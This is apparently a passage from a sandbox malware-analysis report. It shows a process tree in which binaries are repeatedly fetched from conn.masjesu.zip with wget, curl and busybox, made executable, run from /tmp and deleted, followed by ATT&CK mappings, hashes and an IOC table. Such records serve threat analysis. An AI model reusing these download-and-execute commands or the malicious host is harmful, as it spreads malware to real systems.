  rm JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  PID:953
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - System Network Configuration Discovery
  PID:954
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:955
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - System Network Configuration Discovery
  PID:957
- /bin/chmod
  chmod 777 bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  ./bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - Executes dropped EXE
  PID:959
- /bin/rm
  rm bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  PID:960
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - System Network Configuration Discovery
  PID:961
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:962
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - System Network Configuration Discovery
  PID:964
- /bin/chmod
  chmod 777 gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - File and Directory Permissions Modification
  PID:965
- /tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  ./gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - Executes dropped EXE
  PID:966
- /bin/rm
  rm gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  PID:967
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - System Network Configuration Discovery
  PID:968
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:969
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  PID:971
- /bin/chmod
  chmod 777 BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  ./BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - Executes dropped EXE
  PID:973
- /bin/rm
  rm BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  PID:974
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - System Network Configuration Discovery
  PID:975
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:976
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - System Network Configuration Discovery
  PID:978
- /bin/chmod
  chmod 777 VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  ./VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  PID:981
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - System Network Configuration Discovery
  PID:982
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:983
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  PID:985
- /bin/chmod
  chmod 777 qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - File and Directory Permissions Modification
  PID:986
- /tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  ./qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - Executes dropped EXE
  PID:987
- /bin/rm
  rm qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  PID:988
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - System Network Configuration Discovery
  PID:989
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:990
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - System Network Configuration Discovery
  PID:992
- /bin/chmod
  chmod 777 0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - File and Directory Permissions Modification
  PID:993
- /tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  ./0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - Executes dropped EXE
  PID:994
- /bin/rm
  rm 0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  PID:995

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN	727	inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
/tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt	734	JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
/tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD	763	bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
/tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ	793	gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
/tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR	800	BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
/tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f	815	VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
/tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx	847	qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
/tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt	854	0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
/tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG	861	yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
/tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn	868	JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
/tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG	875	xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
/tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE	882	LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
/tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw	889	fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
/tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV	896	D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
/tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG	903	yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
/tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn	910	JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
/tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG	917	xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
/tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE	924	LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
/tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw	931	fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
/tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV	938	D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN	945	inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
/tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt	952	JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
/tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD	959	bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
/tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ	966	gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
/tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR	973	BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
/tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f	980	VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
/tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx	987	qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
/tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt	994	0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt